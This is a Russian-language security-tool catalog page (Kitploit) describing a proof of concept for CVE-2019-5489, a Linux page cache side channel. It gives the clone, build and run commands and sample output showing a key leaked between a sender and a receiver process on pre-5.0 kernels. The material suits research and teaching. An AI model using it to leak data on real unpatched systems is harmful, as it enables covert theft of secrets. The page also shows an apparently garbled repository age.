Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-5489 — Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux | Kitploit
Инструменты/GitHubGitHub/mmxsrup/cve-2019-5489
Vulnerability AnalysisExploitationInformation GatheringPapers & ResearchLearning & EducationBinary Exploitation
GitHubmmxsrup/cve-2019-5489

CVE-2019-5489

Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux

Репозиторий
1034 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE 2019-5489

Этот репозиторий содержит proof of concept атаки Page Cache Side Channel (CVE-2019-5489) для Linux.

Для оценки бокового канала кэша страниц я реализовал скрытый канал между двумя процессами.
Процесс-отправитель отправляет конфиденциальные данные процессу-получателю через боковой канал кэша страниц.
Атаки на кэш страниц были смягчены в Linux Kernel 5.0 и более поздних версиях, поэтому этот PoC будет работать только до Linux Kernel 5.0.

ПРИМЕЧАНИЕ: Я тестировал на Ubuntu 18.04, Linux 4.15.0-70.

Building

Выполните следующую команду.

root@kitploit:~
git clone https://github.com/mmxsrup/CVE-2019-5489
cd CVE-2019-5489
make

Running

Отключите область подкачки, чтобы упростить атаку.

root@kitploit:~
swapoff -a

Terminal 1

Сначала выполните следующую команду в терминале 1.

root@kitploit:~
make run-sender

Terminal 2

После того, как в терминале 1 будет выведено sending 1th character ..., выполните следующую команду.

root@kitploit:~
make run-receiver

Output

Если выполнение прошло успешно, будет выведено следующее.
Это показывает, что ключ был отправлен от процесса Sender к процессу Reciver через боковой канал кэша страниц.

Terminal 1

root@kitploit:~
LD_LIBRARY_PATH=. ./sender
Sender process
ecicting page cache ...
sending 1th character ...
ecicting page cache ...
sending 2th character ...
ecicting page cache ...
sending 3th character ...
ecicting page cache ...
sending 4th character ...
ecicting page cache ...
sending 5th character ...
ecicting page cache ...
sending 6th character ...
ecicting page cache ...
sending 7th character ...
ecicting page cache ...
sending 8th character ...
ecicting page cache ...
sending 9th character ...

Terminal 2

root@kitploit:~
LD_LIBRARY_PATH=. ./receiver
Sender process
waiting ...
recved caracter(P)
waiting ...
recved caracter(a)
waiting ...
recved caracter(s)
waiting ...
recved caracter(s)
waiting ...
recved caracter(W)
waiting ...
recved caracter(o)
waiting ...
recved caracter(r)
waiting ...
recved caracter(d)
waiting ...
recved caracter()
Received key: PassWord

References

  • Daniel Gruss et al. Page cache attacks [CCS 19]
Скачать инструмент